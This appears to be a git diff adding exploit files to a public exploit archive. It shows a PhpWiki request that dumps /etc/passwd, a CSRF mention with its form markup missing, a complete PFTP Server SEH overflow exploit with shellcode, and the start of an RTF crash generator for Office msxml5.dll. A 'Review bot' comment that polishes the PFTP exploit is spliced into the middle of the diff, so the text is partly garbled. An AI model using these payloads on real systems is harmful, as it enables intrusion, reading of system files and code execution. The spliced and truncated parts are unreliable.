Loading “/etc/passwd”

+
+ passwd from “plain file /etc/passwd” content is identical to current version 1 - no new revision created

Complete.

+

Return to PhpWikiAdministration

+(...) + +#2 - Example request: +GET /phpwiki/index.php/passwd HTTP/1.1 +Host: 192.168.0.10 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: pl,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http://192.168.0.10/phpwiki/index.php/PhpWikiAdministration +Cookie: folder_p-tbx=Open; PhpWiki_WIKI_ID=admin; PHPSESSID=643k8jmar8jielfn3metobp625 +Connection: keep-alive + +#2 - Example response: +HTTP/1.1 200 OK +Date: Sat, 29 Aug 2015 22:10:34 GMT +Server: Apache/2.2.22 (Debian) +X-Powered-By: PHP/5.4.41-0+deb7u1 +ETag: W/"97df6cb9b2668497eb1a804ab9c18eb8" +Last-Modified: Sat, 29 Aug 2015 22:09:55 GMT +Cache-Control: must-revalidate +Expires: Sat, 29 Aug 2015 22:10:14 GMT +Vary: Cookie +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html +Content-Length: 22599 +(...) + +

root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/bin/sh +bin:x:2:2:bin:/bin:/bin/sh +sys:x:3:3:sys:/dev:/bin/sh +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/bin/sh +man:x:6:12:man:/var/cache/man:/bin/sh +lp:x:7:7:lp:/var/spool/lpd:/bin/sh +mail:x:8:8:mail:/var/mail:/bin/sh +news:x:9:9:news:/var/spool/news:/bin/sh +uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh +proxy:x:13:13:proxy:/bin:/bin/sh +www-data:x:33:33:www-data:/var/www:/bin/sh +backup:x:34:34:backup:/var/backups:/bin/sh +list:x:38:38:Mailing List Manager:/var/list:/bin/sh +irc:x:39:39:ircd:/var/run/ircd:/bin/sh +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh +nobody:x:65534:65534:nobody:/nonexistent:/bin/sh +libuuid:x:100:101::/var/lib/libuuid:/bin/sh +mysql:x:101:103:MySQL Server,:/nonexistent:/bin/false +messagebus:x:102:106::/var/run/dbus:/bin/false +colord:x:103:107:colord colour management daemon,:/var/lib/colord:/bin/false +usbmux:x:104:46:usbmux daemon,:/home/usbmux:/bin/false +miredo:x:105:65534::/var/run/miredo:/bin/false +ntp:x:106:113::/home/ntp:/bin/false +Debian-exim:x:107:114::/var/spool/exim4:/bin/false +arpwatch:x:108:117:ARP Watcher,:/var/lib/arpwatch:/bin/sh +avahi:x:109:118:Avahi mDNS daemon,:/var/run/avahi-daemon:/bin/false +beef-xss:x:110:119::/var/lib/beef-xss:/bin/false +dradis:x:111:121::/var/lib/dradis:/bin/false +pulse:x:112:122:PulseAudio? 
daemon,:/var/run/pulse:/bin/false +speech-dispatcher:x:113:29:Speech Dispatcher,:/var/run/speech-dispatcher:/bin/sh +haldaemon:x:114:124:Hardware abstraction layer,:/var/run/hald:/bin/false +iodine:x:115:65534::/var/run/iodine:/bin/false +postgres:x:116:127:PostgreSQL administrator,:/var/lib/postgresql:/bin/bash +sshd:x:117:65534::/var/run/sshd:/usr/sbin/nologin +redsocks:x:118:128::/var/run/redsocks:/bin/false +snmp:x:119:129::/var/lib/snmp:/bin/false +stunnel4:x:120:130::/var/run/stunnel4:/bin/false +statd:x:121:65534::/var/lib/nfs:/bin/false +sslh:x:122:133::/nonexistent:/bin/false +Debian-gdm:x:123:134:Gnome Display Manager:/var/lib/gdm3:/bin/false +rtkit:x:124:136:RealtimeKit?,:/proc:/bin/false +saned:x:125:137::/home/saned:/bin/false +devil:x:1000:1001:devil,:/home/devil:/bin/bash +debian-tor:x:126:138::/var/lib/tor:/bin/false +privoxy:x:127:65534::/etc/privoxy:/bin/false +redis:x:128:139:redis server,:/var/lib/redis:/bin/false

+
+(...) + + +3/ Cross Site Request Forgery + +Since there is no csrf protection in application, remote attacker is able to trigger specific actions. + +PoC: + + + +
+ + + + + + + + + + +
+ + diff --git a/platforms/php/webapps/38030.php b/platforms/php/webapps/38030.php new file mode 100755 index 000000000..9de01e216 --- /dev/null +++ b/platforms/php/webapps/38030.php @@ -0,0 +1,38 @@ + diff --git a/platforms/windows/dos/38028.pl b/platforms/windows/dos/38028.pl new file mode 100755 index 000000000..8fa97672e --- /dev/null +++ b/platforms/windows/dos/38028.pl 
@@ -0,0 +1,58 @@
+#*************************************************************************************************************
+#
+# Exploit Title: PFTP Server 8.0f (lite) SEH bypass technique tested on Win7x64
+# Date: 8-29-2015
+# Software Link: http://www.heise.de/download/the-personal-ftp-server-78679a5e8458e9faa7c5564617bdd4c4-1440883445-267104.html
+# Exploit Author: Robbie Corley
+# Contact: c0d3rc0rl3y@gmail.com
+# Website:
+# CVE:
+# Category: Local Exploit
+#
+# Description:
+# There is a textfield within the program that asks for IPs to be blocked against the FTP server that is vulnerable to an SEH based buffer overflow.
+#
+# Side Notes: I haven't been able to implement a partial EIP overwrite for ASLR on this exploit, so I had to resort
+# to manually adding an exception to ASLR in the registry for this to work.
+# creds to Corelan & team: https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/
+#
+# Edit HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\ and add a new key called “MoveImages” (DWORD)
+# set the key to '0'.
+#
+# Instructions:
+# Generate the payload text file by running this payload creator as is. The payload is called: buffy.txt by default
+# Next, open the pftp.exe program.
+# Click 'options', 'advanced options', and 'block ip'. Click on the text field and paste
+# in your payload generated by this payload creator and click 'Add'. 
It will look like this: +#AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA됐31Ò²0d‹‹R ‹R‹B‹r ‹€~ 3uò‰Çx<‹Wx‹z Ç1í‹4¯ÆE>Fatauò~Exitué‹z$Çf‹,o‹zÇ‹|¯üÇhytehkenBh Bro‰áþI 1ÀQPÿא +# +# that's it. You should then be greeted with a MessageBox. 
+#**************************************************************************************************************
+
+my $junk = "A" x 272;
+
+#$nseh = "\xcc\xcc\xcc\xcc"; # breakpoint for testing
+
+$nseh = "\xeb\x10\x90\x90"; # jump to shellcode
+$seh = pack('V',0x03033303); # popad, call ebp from \Device\HarddiskVolume1\Windows\Fonts\StaticCache.dat, which is outside the module range and has SEH off
+
+#MessageBox Shellc0de
+#https://www.exploit-db.com/exploits/28996/
+
+my $shellcode =
+"\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42".
+"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03".
+"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b".
+"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e".
+"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c".
+"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74".
+"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe".
+"\x49\x0b\x31\xc0\x51\x50\xff\xd7";
+
+$nops = "\x90" x 20;
+my $junk2 = "\x90" x 1000;
+
+open(myfile,'>buffy.txt');
+
+print myfile $junk.$nseh.$seh.$nops.$shellcode.$junk2;
+close (myfile);
\ No newline at end of file
diff --git a/platforms/windows/dos/38031.pl b/platforms/windows/dos/38031.pl
new file mode 100755
index 000000000..52f1e924d
--- /dev/null
+++ b/platforms/windows/dos/38031.pl
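Review bot: The header of 38028.pl gives `Category: Local Exploit` while the commit files it under `platforms/windows/dos/`, and the one fact a reader triaging this entry needs sits in the middle of the comment block: per the author's side note, it only works once ASLR has been switched off host-wide through the `MoveImages` registry value. I would give that its own header line, e.g. `# Precondition: ASLR disabled system-wide (MoveImages=0); fails with default mitigations per author`, and make the category agree with the path. Separately, `open(myfile,'>buffy.txt');` uses a bareword handle with the mode fused into the file name and never checks the result, so a failed write is silent. `open(my $fh, '>', 'buffy.txt') or die "buffy.txt: $!";` reports the failure, with the `print` and `close` lines switched to `$fh`.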
@@ -0,0 +1,41 @@ +#!/usr/bin/perl -w +# Title : Microsoft Office 2007 msxml5.dll - Crash Proof Of Concept +# Tested : Microsoft Office 2007 / Win7 +# DLL : msxml5.dll 5.20.1072.0 +# WINWORD.EXE version : 12.0.6612.1000 +# +# +# Author : Mohammad Reza Espargham +# Linkedin : https://ir.linkedin.com/in/rezasp +# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com +# Website : www.reza.es +# Twitter : https://twitter.com/rezesp +# FaceBook : https://www.facebook.com/mohammadreza.espargham +# +#Demo : http://youtu.be/Eciu50k7vbI + +open FILE, ">poc.rtf"; + +$buffer="\x7b\x5c\x72\x74\x66\x31\x7b\x5c\x66\x6f\x6e\x74\x74\x62\x6c\x7b\x5c\x66\x30\x5c".#rtf1 Standard Header... +"\x66\x6e\x69\x6c\x5c\x66\x63\x68\x61\x72\x73\x65\x74\x30\x56\x65\x72\x64\x61\x6e\x61\x3b". +"\x7d\x7d\x5c\x76\x69\x65\x77\x6b\x69\x6e\x64\x34\x5c\x75\x63\x31\x5c\x70\x61\x72\x64\x5c". +"\x73\x62\x31\x30\x30\x5c\x73\x61\x31\x30\x30\x5c\x6c\x61\x6e\x67\x39\x5c\x66\x30\x5c\x66". +"\x73\x32\x32\x5c\x70\x61\x72\x5c\x70\x61\x72\x64\x5c\x73\x61\x32\x30\x30\x5c\x73\x6c\x32". +"\x37\x36\x5c\x73\x6c\x6d\x75\x6c\x74\x31\x5c\x6c\x61\x6e\x67\x39\x5c\x66\x73\x32\x32\x5c". +"\x70\x61\x72\x7b\x5c\x6f\x62\x6a\x65\x63\x74\x5c\x6f\x62\x6a\x6f\x63\x78\x7b\x5c\x2a\x5c". +"\x6f\x62\x6a\x64\x61\x74\x61\x0a\x30\x31\x30\x35\x30\x30\x30\x30\x30\x32\x30\x30\x30\x30". 
+ +"\x30\x30\x31\x42\x30\x30\x30\x30\x30\x30\x34\x44\x35\x33\x34\x33\x36\x46\x36\x44\x36\x33\x37\x34\x36\x43\x34\x43\x36\x39\x36\x32\x32\x45\x34\x43\x36\x39\x37\x33\x37\x34\x35\x36\x36\x39\x36\x35\x37\x37\x34\x33\x37\x34\x37\x32\x36\x43\x32\x45\x33\x32\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x45\x30\x30\x30\x30\x0a\x44\x30\x43\x46\x31\x31\x45\x30\x41\x31\x42\x31\x31\x41\x45\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x33\x45\x30\x30\x30\x33\x30\x30\x46\x45\x46\x46\x30\x39\x30\x30\x30\x36\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x30\x30\x30\x30\x30\x30\x30\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x30\x30\x30\x30\x30\x30\x32\x30\x30\x30\x30\x30\x30\x30\x31\x30\x30\x30\x30\x30\x30\x46\x45\x46\x46\x46\x46\x46\x46\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46". 
+"\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x
46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x44\x46\x46\x46\x46\x46\x46\x46\x45\x46\x46\x46\x46\x46\x46\x46\x45\x46\x46\x46\x46\x46\x46\x30\x34\x30\x30\x30\x30\x30\x30\x30\x35\x30\x30\x30\x30\x30\x30\x46\x45\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x
46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x
46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x35\x32\x30\x30\x36\x46\x30\x30\x36\x46\x30\x30\x37\x34\x30\x30\x32\x30\x30\x30\x34\x35\x30\x30\x36\x45\x30\x30\x37\x34\x30\x30\x37\x32\x30\x30\x37\x39\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x36\x30\x30\x30\x35\x30\x30\x46\x46\x46\x46\x46\x
46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x30\x32\x30\x30\x30\x30\x30\x30\x34\x42\x46\x30\x44\x31\x42\x44\x38\x42\x38\x35\x44\x31\x31\x31\x42\x31\x36\x41\x30\x30\x43\x30\x46\x30\x32\x38\x33\x36\x32\x38\x30\x30\x30\x30\x30\x30\x30\x30\x36\x32\x65\x61\x44\x46\x42\x39\x33\x34\x30\x44\x43\x44\x30\x31\x34\x35\x35\x39\x44\x46\x42\x39\x33\x34\x30\x44\x43\x44\x30\x31\x30\x33\x30\x30\x30\x30\x30\x30\x30\x30\x30\x36\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x33\x30\x30\x34\x46\x30\x30\x36\x32\x30\x30\x36\x41\x30\x30\x34\x39\x30\x30\x36\x45\x30\x30\x36\x36\x30\x30\x36\x46\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x32\x30\x30\x30\x32\x30\x30\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30". 
+ +"\x30\x30\x36\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x33\x30\x30\x34\x46\x30\x30\x34\x33\x30\x30\x35\x38\x30\x30\x34\x45\x30\x30\x34\x31\x30\x30\x34\x44\x30\x30\x34\x35\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x32\x30\x30\x30\x32\x30\x31\x30\x31\x30\x30\x30\x30\x30\x30\x30\x33\x30\x30\x30\x30\x30\x30\x46\x46\x46\x46\x46\x46\x46\x46\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x30\x30\x30\x30\x30\x30\x31\x36\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x34\x33\x30\x30\x36\x46\x30\x30\x36\x45\x30\x30\x37\x34\x30\x30\x36\x35\x30\x30\x36\x45\x30\x30\x37\x34\x30\x30\x37\x33\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x32\x30\x30\x30\x32\x30\x30\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30
